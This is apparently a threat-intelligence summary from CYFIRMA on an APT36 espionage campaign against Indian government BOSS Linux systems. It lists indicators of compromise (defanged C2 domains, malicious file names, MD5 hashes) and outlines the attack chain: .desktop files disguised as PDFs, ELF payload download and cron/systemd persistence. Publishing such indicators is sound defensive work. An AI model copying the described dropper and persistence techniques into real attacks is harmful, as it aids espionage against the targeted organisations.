CYFIRMA Research- APT36 Campaign Targets Indian Defense BOSS Linux system
Description
CYFIRMA has uncovered an ongoing cyber-espionage campaign orchestrated by APT36, a Pakistan-linked threat actor, targeting Indian Government entities.
Key Highlights:
- Initial Access: Spear-phishing emails delivering weaponized .desktop files disguised as PDFs.
- Target Platforms: Windows & Linux BOSS OS.
- Malware Behavior: Downloads & executes ELF payloads, establishes persistence via cron/systemd, and communicates with C2 servers (modgovindia[.]space, securestore[.]cv).
- Impact: Data exfiltration, sustained access, and evasion of security controls.
- Malware Identifiers: Meeting_Ltr_ID1543ops.pdf.desktop, Meeting_Ltr_ID1543ops.pdf-.elf (MD5: 10b7139952e3daae8f9d7ee407696ccf, 5bfeeae3cc9386513dc7c301c61e67a7).
This campaign reflects APT36’s increasing sophistication, tailoring malware to exploit indigenous technologies like Linux BOSS OS, and ensuring persistent, covert access to critical government infrastructure.
Organizations must stay vigilant, strengthen phishing defenses, and continuously monitor for malicious infrastructure and anomalous activity.
Link to the Research Report: https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/
#CyberSecurity #ThreatIntel #APT36 #CyberEspionage #Linux #Windows #Phishing #CYFIRMA #CYFIRMAresearch #ExternalThreatLandscapeManagement #ETLM
https://www.cyfirma.com/
United States
